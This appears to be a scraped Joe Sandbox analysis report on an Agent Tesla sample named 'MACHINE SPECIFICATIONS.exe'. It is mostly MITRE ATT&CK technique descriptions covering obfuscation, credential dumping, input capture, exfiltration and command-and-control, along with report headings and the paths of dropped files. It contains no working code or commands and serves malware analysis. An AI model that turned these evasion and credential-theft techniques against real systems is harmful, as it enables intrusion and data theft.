Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MACHINE SPECIFICATIONS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MACHINE SPECIFICATIONS.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newapp.exe.log

C:\Users\user\AppData\Roaming\newapp\newapp.exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Snort IDS Alerts

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Function 05EE8B28 Relevance: 5.4, Strings: 4, Instructions: 385
COMMON

Function 05DF7BF0 Relevance: 1.6, APIs: 1, Instructions: 148
libraryCOMMON

Function 023F0878 Relevance: 1.8, APIs: 1, Instructions: 273
memoryCOMMON

Function 05DF7B41 Relevance: 1.7, APIs: 1, Instructions: 206
libraryCOMMON

Function 05EE7440 Relevance: 1.7, APIs: 1, Instructions: 180
libraryCOMMON

Function 05DF7E50 Relevance: 1.7, APIs: 1, Instructions: 177
registryCOMMON

Function 05DF7FD0 Relevance: 1.6, APIs: 1, Instructions: 128
registryCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre